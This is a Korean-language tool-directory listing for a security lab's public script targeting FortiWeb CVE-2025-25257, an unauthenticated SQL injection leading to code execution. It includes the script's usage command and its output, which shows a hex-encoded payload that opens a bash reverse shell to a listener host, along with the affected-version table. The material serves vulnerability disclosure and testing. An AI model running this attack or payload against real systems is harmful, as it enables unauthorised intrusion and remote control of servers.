Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
watchTowr-vs-FortiWeb-CVE-2025-25257 — FortiWeb CVE-2025-25257용 탐지 아티팩트 생성기, 16진수 인코딩된 페이로드 스프레이를 통해 인증되지 않은 SQL 인젝션을 악용하여 원격 코드 실행을 달성합니다. | Kitploit
도구/GitHubGitHub/watchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257

watchTowr-vs-FortiWeb-CVE-2025-25257

FortiWeb CVE-2025-25257용 탐지 아티팩트 생성기, 16진수 인코딩된 페이로드 스프레이를 통해 인증되지 않은 SQL 인젝션을 악용하여 원격 코드 실행을 달성합니다.

저장소 보기
10024101년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

watchTowr-vs-FortiWeb-CVE-2025-25257

FortiWeb CVE-2025-25257용 탐지 아티팩트 생성기

기술적 세부 사항은 블로그 게시물을 참조하세요.

https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194

동작 중 탐지

python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

설명

이 스크립트는 FortiWeb이 CVE-2025-25257에 취약한지 탐지하려고 시도합니다.

영향을 받는 버전

다음 FortiWeb 버전이 영향을 받습니다.

버전영향을 받는 버전해결 방안
FortiWeb 7.67.6.0 ~ 7.6.37.6.4 이상으로 업그레이드
FortiWeb 7.47.4.0 ~ 7.4.77.4.8 이상으로 업그레이드
FortiWeb 7.27.2.0 ~ 7.2.107.2.11 이상으로 업그레이드
FortiWeb 7.07.0.0 ~ 7.0.107.0.11 이상으로 업그레이드

자세한 정보는 FortiGuard Labs PSIRT를 방문하세요.

watchTowr 랩스 팔로우하기

최신 보안 연구를 위해 watchTowr 랩스 팀을 팔로우하세요.

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
도구 다운로드